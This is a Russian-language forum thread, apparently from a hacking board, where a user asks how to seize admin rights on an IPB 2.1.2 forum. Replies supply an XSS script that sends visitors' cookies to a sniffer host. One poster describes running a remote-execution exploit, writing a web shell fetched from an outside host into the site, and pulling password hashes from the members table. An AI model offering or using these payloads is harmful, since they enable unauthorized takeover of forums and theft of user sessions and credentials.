Форумы Админские права в Ipb 2.1.2

Можно ли как-то завладеть правами в подобном форуме? Объясните как. Дальше сам разберусь...

 

1. можно прочитать кучу статтей по поводу IPB... RTFM
2. послать админу жалобу с злобным скриптом внутри... по типу такого: <script>img = new Image(); img.src = "http://сниффер/сниффер.php?"+location.host+document.cookie;</script>

 

Модераторы прошу удалить тему , ибо таких тем навалом в ачате , надо искать и всё.

 

Почему же сразу удалить? Просто предлагаю администрации сайта все высказывания на форуме объединять в статьи и обновлять их по ходу поступления новых постов, а не нужные темы, в которых толком ничё не разобрать, а только обсуждение хакеров между собой, просто удалить... или закрыть и переместить в отдельную папку... Рядовому юзеру не очень то понятно о чём тут многие говорят... А в статьях всё бы попорядку писалось... А пытаться выдёргивать из каждого поста что-то нужное не очень просто...

Предлагаю администрации рассмотреть моё предложение, т.к. будет на много меньше подобных постов.

 

Статей много, но подчеркнуть для себя что-то нужное очень трудно, т.к. многое не очень понятно, с чем приходится долго разбираться... Для этого помоему и создна форум... А здесь просто посылают все в Google или почитать "какие-то" статьи... Если пишети про статьи, то давайте полный путь к ним, если знаете... (обращение ко всем)

А сниффер от античата сойдёт для получения куков? или надо писать свой сниффер? А вообще хочу научиться писать свой... Есть статьи?

 

ты что читать разучился , зайди в поиск и кавыряйся тама, может болше 100 тем есть на эту тему.

 

Если бы я не пытался искать, то не зашёл бы сюда... Если есть ссылки по данноё тематике, то прошу предоставить... Буду благодарен...

 

А че догадатся тяжело..... 2.1.2 ниже 2.1.4 значит все дырки еще не закрыты. Поражаюсь твоей логике.

 

php-including IPB вот тебе задача иши .

 

Блин, набери в яндексе "Взлом Ipb 2.1.2" какие ещё ссылки в студию?! поищи сам... Правильно, как сказал DimaHbl4 всё, что "придумано" для взлома более поздних версий, актуально и для этой.

 

Не ну это то ещё понятно... =)

 

парень если ты читал статьи, искал в гугле, и ничего не понял... то кто тебе объяснит?
зачем лезть туда что непонимаешь???

 

Да блин нашёл что-то... вникаю... Тока начал читать... дайте время... не гоните вы так сразу... А то сразу съесть готовы... лучше промолчите, чем писть "юзай поиск"...

Объясните тока одно, как через сниффер завладеть куками? и подходит ли для этого сниффер на античате?

 

http://video.antichat.ru/file187.html
видео...

 

Позавчера как раз пришлось эту версию подергать. Сделал всего два шага:
1. скачал сплоит для 2.1.5 - удаленное выполнение команд
2. а потом залил шелл, используя командную строку
GET http://mysite.narod.ru/shell.txt > chat/images.php

Ну а спомощью шелла , бери из мускула хэши (select * from ibf_members) и т.д.